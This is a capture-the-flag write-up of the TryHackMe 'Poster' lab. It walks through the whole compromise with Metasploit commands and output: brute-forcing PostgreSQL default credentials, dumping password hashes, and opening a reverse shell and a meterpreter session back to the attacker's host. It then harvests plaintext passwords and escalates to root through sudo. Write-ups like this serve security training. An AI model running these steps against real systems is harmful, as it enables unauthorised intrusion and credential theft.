Sep 13, 2020
Overview
quick techniqual writeup, explaining how we got root user on Poster machine from tryhackme.
Target Informations
IP ADRESS : 10.10.207.249
Host Name : poster.thm
Dificulty : easy
Description : The sys admin set up a rdbms in a safe way.
EXTERNAL ENUMERATION
nmap scanning
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-29T00:54:25
| Not valid after: 2030-07-27T00:54:25
| MD5: da57 3213 e9aa 9274 d0be c1b0 bbb2 0b09
|_SHA-1: 4e03 8469 28f7 673b 2bb2 0440 4ba9 e4d2 a0d0 5dd5
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne
port 80 has a static website, with an email news letter post submit form, tested it, nothing special
port 5432 sounds like a good entry, but mostly we'll need to be authenticated in order to abuse postgresql,
what is a postgressql database:
from wikipedia, Postgres is a free and open-source relational database management system (RDBMS) emphasizing extensibility and SQL compliance.
well, i'll be using metasploit to brute force postgress, and retrive some passwords, there is a quite good module for that auxiliary/scanner/postgres/postgres_login
msf5 > use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 10.10.207.249
RHOSTS => 10.10.207.249
msf5 auxiliary(scanner/postgres/postgres_login) > run
[-] 10.10.207.249:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
...
[+] 10.10.207.249:5432 - Login Successful: postgres:password@template1
and we got a hit, the database is not properly configured and the default credentials provided for initial authentication and configuration are never changed.
username : postgres
password : password
database : template1
we can always grab the database version if we need to with auxiliary/admin/postgres/postgres_sql module
msf5 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_sql
msf5 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 10.10.207.249
version
-------
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] Auxiliary module execution completed
or maybe dump the users hashes, for a later offline brute force attack
msf5 auxiliary(admin/postgres/postgres_sql) > use auxiliary/scanner/postgres/postgres_hashdump
msf5 auxiliary(scanner/postgres/postgres_hashdump) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
we can also read specific files from the target server with auxiliary/admin/postgres/postgres_readfile or maybe execute arbitrary commands with exploit/multi/postgres/postgres_copy_from_program_cmd_exec
now as we have what we need (credentials), lets get a reverse shell on the target host
Tip : when working with metsploit, using setg instead of set, will set the value globaly so u wont need to set that value again
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > setg LHOST 10.9.123.226
LHOST => 10.9.123.226
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > setg USERNAME postgres
USERNAME => postgres
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > setg PASSWORD password
PASSWORD => password
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 10.9.123.226:4444
[*] 10.10.207.249:5432 - 10.10.207.249:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.207.249:5432 - Exploiting...
[+] 10.10.207.249:5432 - 10.10.207.249:5432 - v8waOXCAxJN dropped successfully
[+] 10.10.207.249:5432 - 10.10.207.249:5432 - v8waOXCAxJN created successfully
[+] 10.10.207.249:5432 - 10.10.207.249:5432 - v8waOXCAxJN copied successfully(valid syntax/command)
[+] 10.10.207.249:5432 - 10.10.207.249:5432 - v8waOXCAxJN dropped successfully(Cleaned)
[*] 10.10.207.249:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.9.123.226:4444 -> 10.10.207.249:51362) at 2020-09-11 22:21:39 +0100
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
directly i upgraded my initial shell into a full meterpreter shell with multi/manage/shell_to_meterpreter module:
msf5 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST 10.9.123.226 no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION 1 yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set LHOST 10.9.123.226
LHOST => 10.9.123.226
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.123.226:4433
[*] Sending stage (980808 bytes) to 10.10.207.249
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
[*] Meterpreter session 3 opened (10.9.123.226:4433 -> 10.10.207.249:47894) at 2020-09-11 22:42:44 +0100
[*] Stopping exploit/multi/handler
msf5 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.9.123.226:4444 -> 10.10.207.249:51362 (10.10.207.249)
2 meterpreter x86/linux no-user @ ubuntu (uid=109, gid=117, euid=109, egid=117) @ 10.10.207.249 10.9.123.226:4433 -> 10.10.207.249:47894 (10.10.207.249)
Internal Enumerations
running Linpeas.sh gave us the overal overview about our target, with some credentials from the database.
extracted some passwords
postgres:password
tryhackme:Hacktheplanet!
sistemas:1234abcd
ti:abcd1234
darkstart:qwerty
ssh_user:poster:batman'
poster:batman
and a really intersting file
postgres@ubuntu:~$ cat /var/www/html/config.php
cat /var/www/html/config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
with that passwods we can login as alison user
postgres@ubuntu:~$ su alison
Password: p4ssw0rdS3cur3!#
alison@ubuntu:~$ id
uid=1000(alison) gid=1000(alison) groups=1000(alison),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
and it seems like alison is a member of sudo users, lets see if alison has some special sudo rights
alison@ubuntu:~$ sudo -l
[sudo] password for alison: p4ssw0rdS3cur3!#
Matching Defaults entries for alison on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alison may run the following commands on ubuntu:
(ALL : ALL) ALL
well, (ALL : ALL) ALL is a win for us, as alison has full privilege permissions over ubuntu host, we can quickly laverage to root user
alison@ubuntu:~$ sudo su
root@ubuntu:/home/alison# id
uid=0(root) gid=0(root) groups=0(root)
as our gole consist of retriving the flags
root@ubuntu:~# cat root.txt
THM{REDACTED}
root@ubuntu:~# cat /home/alison/user.txt
THM{REDACTED}
Best Regards